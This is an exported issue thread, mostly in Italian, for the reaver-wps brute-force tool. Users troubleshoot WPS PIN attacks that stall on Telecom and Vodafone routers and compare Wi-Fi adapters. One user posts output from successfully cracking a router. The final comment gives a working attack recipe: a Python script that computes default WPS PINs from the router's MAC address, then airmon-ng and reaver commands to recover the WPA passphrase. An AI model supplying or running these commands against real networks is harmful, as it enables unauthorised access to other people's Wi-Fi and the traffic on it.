Lxrd-AJ / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

[!] WPS transaction failed (code: 0x03) #268

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
hello

i love your project
so i did try it
i did like all tutorials and every thing went fine
however after hours when he arrived to 99.99% it keep giving me error
and keep trying for hours with same error repeating same thing 
i copied it 

[+] 99.99% complete @ 2012-03-16 06:28:29 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

so can anybody help me ???
thanks

sorry for my bad english !!

Original issue reported on code.google.com by leonidis...@gmail.com on 17 Mar 2012 at 8:44

GoogleCodeExporter commented 9 years ago
ciao, parli italiano? Anche io ho il tuo stesso problema nel "testare" un 
router telecom. Stesso pin e ricerca bloccata a 99.99% dopo 4 ore. Hai risolto 
il problema?

Original comment by stut...@gmail.com on 1 May 2012 at 11:35

GoogleCodeExporter commented 9 years ago
purtroppo no :-(  , ho cercato diversi soluzioni ma niente quindi ho lasciato 
stare
mi sa è un problema generale con i router telecom

Original comment by leonidis...@gmail.com on 2 May 2012 at 6:11

GoogleCodeExporter commented 9 years ago
ho letto da qualche parte che se si arriva al 99,99% i primi 4 numeri del pin 
dovrebbero essere corretti, e riprovando la scansione con l'opzione -p 0123 si 
dovrebbe riuscire. Io tra l'altro durante la scansione ho spessissimo errori 
del tipo "wps transaction failed"; non so se sia dovuto al fatto che il segnale 
è debole (-75db) oppure al fatto che il router telecom è troppo lento nel 
rispondere; per evitare quell'errore dovrei provare a introdurre un ritardo con 
lo switch -d 60 (per farlo attendere 60 secondi tra un pin e l'altro). Qualcuno 
dice che backtrack reaver per funzionare deve avere almeno -50db di segnale, mi 
chiedo se quello possa essere un motivo del nostro problema. Il tuo segnale a 
quanto arriva?
Telecom fa schifo in tutto, pure nei router! eheh

Original comment by stut...@gmail.com on 2 May 2012 at 10:02

GoogleCodeExporter commented 9 years ago
si, l'ho letto anch'io , pero mi sembra assurdo che i primi numeri sono sempre 
0123 :-D comunque come ho detto sopra ho provato diversi soluzioni come 
introdurre ritardi o iniziare con la sequenza 0123 pero niente , ho  provato 
anche  reaver v 1.3 e  niente :-(
per quanto riguarda il segnale , non sono sicuro perché  il test lo fatto  
più di un mese fa ma ti posso assicurare che il segnale era circa (-70 dbm) , 
tu hai scritto db non dbm ;-) cio -75 db = - 45 dbm che rappresenta un ottimo 
segnale :O 

Original comment by leonidis...@gmail.com on 2 May 2012 at 11:16

GoogleCodeExporter commented 9 years ago
Grazie della spiegaz, devo ancora fare l'esame di controlli automatici, eheheh. 
Ho rilanciato la scansione con gli switch --no-nacks -p 0123 -d 60. Ma temo che 
non ne uscirà niente. Cmq ti faccio sapere. Però è strano, insomma il router 
supporta il protocollo wps, è sbloccato, ma non funxia. Potrebbe essere che il 
protocollo wps non sia implementato correttamente sui router telecom, e quindi 
non si comporti come dovrebbe. Ho letto che netgear su alcuni suoi router ha 
introdotto un sistema di sicurezza che blocca(temporaneamente) l'accesso al 
router tramite wps (solo col pin, non push button) dopo un tot di tentativi 
falliti.Ma non credo sia il caso telecom.Forse si dovrà aspettare una nuova 
versione di reaver, a patto che qualcuno segnali il problema allo sviluppatore. 
A proposito la mia scheda wifi è atheros, ma non credo che dipenda da quella.

Original comment by stut...@gmail.com on 2 May 2012 at 2:14

GoogleCodeExporter commented 9 years ago
fammi indovinare! fai ingegneria? :-) 
ho gia provato quell comando -p 0123 -d etc etc ...
non funziona! sta sempre bloccato al 99,99% provando un pin specifico,  quindi 
inutile perder tempo
io da un po che aspetto la nuova versione di reaver ;-) 
io uso la scheda rtl8187 , e comunque da quello che ho sentito ,la scheda 
atheros è famosa perche funziona bene con programmi come aircrack, quindi non 
è la tua scheda a dare problemi! 

Original comment by leonidis...@gmail.com on 2 May 2012 at 2:54

GoogleCodeExporter commented 9 years ago
Yes, ingegneria, ma meccanica. Mi restano giusto 4 esami tutti di elettronica! 
Eheheh

Original comment by stut...@gmail.com on 2 May 2012 at 8:13

GoogleCodeExporter commented 9 years ago
Se la tua scheda ha il chipset rtl8187 allora forse è un' alfa AWUS036H vero? 
Ero tentato di prenderla per cercare di migliorare la potenza del segnale o 
prendere più reti.Ma sono indeciso tra questa e la AWUS036NHR: supportano il 
protocollo N dovrebbe essere migliore, ma dai commenti in rete pare che sia 
molto meglio la AWUS036H anche se limitata al protocollo g. Ho letto che 
aspettavano che uscisse qualche firmware per migliorare la situazione.  In 
alternativa potrei orientarmi su un prodotto da esterno come Airlive 
AirMax5.Costa poco e pare funzioni bene. Ho visto che ci sono prodotti della 
alfa per esterno ma non so se sono buoni e soprattutto se i prezzi sono 
abbordabili. Tu ne sai qualcosa?

Original comment by stut...@gmail.com on 2 May 2012 at 10:39

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
si, ho alfa AWUS036H , lo comprata perche avevo bisogno di una scheda che 
supporti la modalità ap (access point ) per fare un esperimento .
anch'io ero indeciso fra questa e AWUS036NHR pero come hai detto tu cerano 
tanti commenti negativi,  in piu la AWUS036H era in offerta e costava veramente 
meno rispetto la AWUS036NHR quindi ho preso la AWUS036H.
la cosa positiva è che sempre supportata in distribuzione famose come back 
track.
cmq io ho trovato un sito tedesco buono che aveva la AWUS036H in offerta,  solo 
che adesso non mi ricordo il suo indirizzo , cercherò di trovarlo quando torno 
a casa 
il prezzo totale (con la consegna ) non dovrebbe superare il 35

Original comment by leonidis...@gmail.com on 3 May 2012 at 8:46

GoogleCodeExporter commented 9 years ago
salve, stò provando sul mio router telecom, tenendovi la mia cara tp-link 
tl-wn422g accanto.. stesso problema, blocco 99%, dopo vari test che ho fatto 
sulla mia rete, ho scoperto che i WPS transaction failed iniziano a comparire 
quando mi allontano, facendo andare il segnale sotto i -75 db, però se aumento 
il txpower della tp gli errori sono meno frequenti, quindi a quanto credo di 
aver capito, dovrebbe essere il router che non accetta transazioni wps se 
richieste da client troppo lontani, in modo da evitare attacchi dall'esterno. 
almeno in questo telecom sembra essere stata brava, i nostri routers per ora 
sono sicuri contro i wps bruteforce.

Original comment by dvbr...@gmail.com on 3 May 2012 at 12:36

GoogleCodeExporter commented 9 years ago
Non credo sia un merito di telecom, semplicemente il segnale si perde perché 
troppo debole. Io ho un router sitecom, e disattivando il wps non compare tra 
le reti attaccabili. Ho letto invece che alcuni router risulatno vulnerabili 
anche con wps disattivato. Il mio no: lanciando il comando wash -i mon0, la mia 
rete non compare nemmeno. Provando con altre reti (telecom,belkin, ecc) ho 
sempre una marea di "wps transaction failed"; però la ricerca dei pin va 
avanti, anche se un pin viene tentato anche 3-4 volte. Mi chiedo se la ricerca 
possa andare a buon fine nonostante tutti questi errori o è meglio abortire 
subito

Original comment by stut...@gmail.com on 3 May 2012 at 12:58

GoogleCodeExporter commented 9 years ago
^^^^^^^^^^^^^
ti consiglio di abortire subito e non perdere tempo!
io ho lasciato il pc per 5 ore senza progressi :-(  
poi io non credo che sia un problema di segnale perche quando inizia l'attacco 
, i pin vengono testati tutti poi arriva 99,99% poi si blocca con un pin 
specifico
intanto consiglio di disattivare il vostro wps per sicurezza :-D 

Original comment by leonidis...@gmail.com on 3 May 2012 at 1:19

GoogleCodeExporter commented 9 years ago
Ho riattivato il wps sul mio router e sto provando a trovare il pin. Il segnale 
è -50, eppure ho comunque molti errori "wps transaction failed"....lo lascio 
li a macinare, vediamo cosa combina...

Original comment by stut...@gmail.com on 3 May 2012 at 1:32

GoogleCodeExporter commented 9 years ago
Ragazzi spero di di non fare Spamm.....
Se vi interessane le varie schede di rete sopracitate e altro.... ;-) vi posto 
il link del mio fornitore... vi assicuro che ha un servizio di spedizione 
Impeccabile ;)
Dove Comperare... >> 
http://www.net-wifi.it/categorie.aspx?cid=1&n=ADATTATORI+USB+wi+fi+ALTA+POTENZA&
p=2&pstart=0

Original comment by altafede...@gmail.com on 4 May 2012 at 4:21

GoogleCodeExporter commented 9 years ago
io sono incerto se prendere la AWUS036H, la AWUS036NHR, oppure la AWUS051NH.
Dai test che ho letto in giro la AWUS036H supera la AWUS051NH pur essendo solo 
G. Ma tra AWUS036H e AWUS036NHR? quest'ultima ha una potenza di 2watt...mentre 
la 036H "solo" 1. Il mio obiettivo sarebbe ricevere meglio una rete N; il 
router è circa due piani sopra, e se dal mio salotto prendo bene (-64db) dalla 
camera da letto è un disastro: segnale bassissimo e incredibilmente variabile: 
nel giro di pochi secondi schizza da un livello all'altro impedendomi di 
collegarmi. Qualcuno ha qualche consiglio? La prova la si fa purtroppo solo sul 
campo, ma magari qualcuno che le ha provate entrambe sa dirmi la sua esperienza

Original comment by stut...@gmail.com on 6 May 2012 at 11:04

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
allora non sono un esperto ! 
pero da quello che ho studiato o almeno capito :)
per il ricevitore la potenza non serve per nulla , quello che conta è l'antenna
tiene conto il router ha come potenza massima 17 dbm + circa 3 dbm guadagno 
quindi in totale 20 dbm cio 0.1 W 
quindi capisci che il router che ha bisogno di piu potenza pero sara illegale 
trasmettere con piu potenza 
quindi prendi quella di un 1W (che sarebbe pure inutile per il ricevitore )

quindi il mio consiglio è quello di comprare un'antenna con guadagno alto 
puoi anche smontare l'antenna del router e mettere una con guadagno maggiore 
(ricordo ancora che sarebbe illegale superare il 20 dbm pero che se ne frega :) 
)

voglio ricordare ancora che la potenza alta fa male !!!
non ti consiglio di usare qualcosa che trasmette a 2W o 1W dentro casa

Original comment by leonidis...@gmail.com on 6 May 2012 at 1:07

GoogleCodeExporter commented 9 years ago
Riporto su questa discussione.
Da qualche parte che non ricordo dove ho letto che i nuovi router della Telecom 
implementano il WPS in modo leggermente diverso, e più in specifico sulla 
checksum del pin.
Se qualcuno possiede un router Telecom a casa se cortesemente può avviare 
reaver e nel frattempo cerchi di catturare i vari pacchetti che circolano in 
modo se possiamo capirci qualcosa.
Grazie

Original comment by crashe...@gmail.com on 25 Sep 2012 at 8:15

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Ciao ragazzi, io sono riuscito a bucarmi il router d-link. Tempo impiegato: 4 
ore. Nessun blocco e tutto liscio come l'olio. Il tool funziona egregiamente e 
non so perchè a voi si blocca. Ho utilizzato:
bt4 con reaver-1.4. la rete è a circa 15 metri (potenza segnale 60%). Anche a 
me sono apparsi frequenti seganli di erorri ma sono andato avanti. Vi posto gli 
ultimi messaggi che mi sono apparsi sulla shell:
...
...
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 09364561
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 14285 seconds
[+] WPS PIN: '0936****'
[+] WPA PSK: 'passwordtrovata'
[+] AP SSID: 'mioessid'

Original comment by aiq...@gmail.com on 16 Oct 2012 at 10:54

GoogleCodeExporter commented 9 years ago
e' un roblema di replace dei pin sui modem dei provider telefonici , l 8 numero 
nn e' il checksum degli altri 7 e quindi la teoria del logaritmo base di river 
salta!
un una giornata di ricerche e ancora nn ho trovato la soluzione.

Original comment by gmcfue...@gmail.com on 17 Apr 2013 at 10:12

GoogleCodeExporter commented 9 years ago
salve ho provato a mandare l'attacco reaver in un router telecom con wps aperto,
tenendolo a 4 mt dal router potenza di -67 mi da in una intera nottata sempre 
il seguente errore:
trying pin 12345670
sending EAPOL START request
received identity request
sending identity response
WARNING : receive timeout occurred
sending WSC NACK
wps TRANSACTION FAILED (CODE: 0X02), RE-TRYING last pin
nothing done,nothing to save
0.00% complete @ 2014-07-11 11:00:25 (0seconds/pin)
max time remaining at this rate :(undetermined)  (11000 pins left to try)

e poi rincomincia con lo stesso pin :trying pin 12345670
secondo voi qual'è il problema???

Original comment by francesc...@gmail.com on 11 Jul 2014 at 9:09

GoogleCodeExporter commented 9 years ago
io ho stessa problem solo con telcom router trovo questa problem ..
pefavore qualquno sai ?

 trying pin 12345670
sending EAPOL START request
received identity request
sending identity response
WARNING : receive timeout occurred
sending WSC NACK
wps TRANSACTION FAILED (CODE: 0X02), RE-TRYING last pin

sempre provarare stess pin 

mio scheda è Realtek  RTL8187L 

auita mi ?

Original comment by ghanizar...@gmail.com on 14 Sep 2014 at 4:54

GoogleCodeExporter commented 9 years ago
stesso problema solo su alcuni router (indipendentemente dal segnale) il chè 
significa una cosa sola, incompatibilità negli algoritmi. Soluzione? attendere 
aggiornamenti reaver anche sé..... indubbiamente alcuni avranno risolto il 
problema, ma parliamo di una cosa troppo delicata per essere evidentemente 
messa in rete. In giro troverete solo facke, questa disposizione di comandi 
tutto sommato ha dato qualche risultato in più ma non sempre su alcuni router 
non hanno funzionato neanche questi comandi, tuttosommato tentar non nuoce ciao.
sequenza per WPS
reaver -i mon0 -b xxxxxxxxx -c x -a -L -r -n --dh-small -vv -d 5

Original comment by libr...@hotmail.it on 5 Jan 2015 at 6:43

GoogleCodeExporter commented 9 years ago
salve,
novità per quanto riguarda il trying pin 12345670 bloccato?
Io ho lo stesso problema su un vodafone.
Ma non c'è qualche stringa anche con qualche altro programma per trovare il 
pin e poi inserirlo in reaver con il cod -p "xxxxxxxx"?
su un forum ho trovato questa stringa, ma non so quanto sia attendibile e se si 
riferisca proprio al pin in oggetto:

" Per calcolare il pin wps di default di alcuni modelli usiamo questo script in 
python

"Codice:
import sys 

VERSION    = 1 
SUBVERSION = 0 

def usage(): 
    print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION) 
    print "[*] Usage : python WPSpin.py 123456" 
    sys.exit(0) 

def wps_pin_checksum(pin): 
    accum = 0 

    while(pin): 
        accum += 3 * (pin % 10) 
        pin /= 10 
        accum += pin % 10 
        pin /= 10 
    return  (10 - accum % 10) % 10 

try: 
    if (len(sys.argv[1]) == 6): 
        p = int(sys.argv[1] , 16) % 10000000 
        print "[+] WPS pin might be : %07d%d" % (p, wps_pin_checksum(p)) 
    else: 
        usage() 
except Exception: 
    usage()"

Salviamo il codice in un file di testo e rinominiamo con estenzione py
Ora da terminale digitiamo 

"Codice:
python script.py 223344"

ove 223344 sono le ultime 6 cifre del mac address dell'acces point ad esempio 
abbiamo questo mac: 11:22:33:44:55:66, dovremo prendere le cifre 445566.
ok una volta calcolato il pin procediamo utilizzando reaver 
prepariamo il nostro pc digitando i sequenti comandi

"Codice:
/etc/init.d/network-manager stop
Codice:
airmon-ng check kill
Codice:
airmon-ng start wlan0
Codice:
reaver -i mon0 -b "BSSID" -c "Canale" -vv -p "PIN calcolato"

una volta trovata la password disattiviamo il monitor mode e startiamo il 
network manager

Codice:
airmon-ng stop mon0
Codice:
/etc/init.d/network-manager start

Original comment by domenico...@gmail.com on 10 Feb 2015 at 4:45